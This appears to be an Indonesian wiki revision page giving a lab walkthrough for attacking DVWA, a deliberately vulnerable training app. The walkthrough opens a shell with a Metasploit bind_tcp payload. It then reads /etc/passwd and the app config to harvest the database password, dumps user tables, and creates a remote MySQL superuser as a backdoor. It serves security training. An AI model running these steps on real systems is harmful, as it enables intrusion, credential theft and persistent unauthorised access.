DVWA: Exploit menggunakan Metasploit: Difference between revisions
From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs) New page: ==Persiapan== Masuk ke DVWA, misalnya http://192.168.0.80/DVWA-1.9 username admin password password Klik DVWA Security > Security Level Low > Submit |
Onnowpurbo (talk | contribs) No edit summary |
||
| Line 1: | Line 1: | ||
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | |||
==Persiapan== | ==Persiapan== | ||
| Line 11: | Line 13: | ||
DVWA Security > Security Level Low > Submit | DVWA Security > Security Level Low > Submit | ||
==Gunakan metasploit== | |||
Jalankan | |||
msfconsole thankyou | |||
Lakukan | |||
use multi/handler | |||
set PAYLOAD linux/x86/shell/bind_tcp | |||
show options | |||
set RHOST 192.168.0.80 | |||
exploit | |||
Cek password | |||
whoami | |||
grep apache /etc/passwd | |||
grep apache /etc/group | |||
Cek Password melalui konfigurasi Web | |||
ps -eaf | grep http | |||
pwd | |||
ls -ld /var/www/html | |||
ls -ld /var/www/html/DVWA* | |||
ls -l /var/www/html/DVWA* | |||
Cari password database | |||
ls -l /var/www/html/dvwa/config | |||
cat /var/www/html/dvwa/config/config.inc.php | |||
Explorasi database | |||
echo "show databases;" | mysql -uroot -pdvwaPASSWORD | |||
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD | |||
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD | |||
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | |||
Buat user baru | |||
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD | |||
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | |||
Lihat informasi tabel MySQL | |||
echo "show databases;" | mysql -uroot -pdvwaPASSWORD | |||
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD | |||
Buat user MySQL yang baru | |||
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD | |||
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD | |||
==Referensi== | |||
* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | |||
Revision as of 03:07, 15 February 2016
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.80 exploit
Cek password
whoami grep apache /etc/passwd grep apache /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/dvwa/config cat /var/www/html/dvwa/config/config.inc.php
Explorasi database
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
Buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD
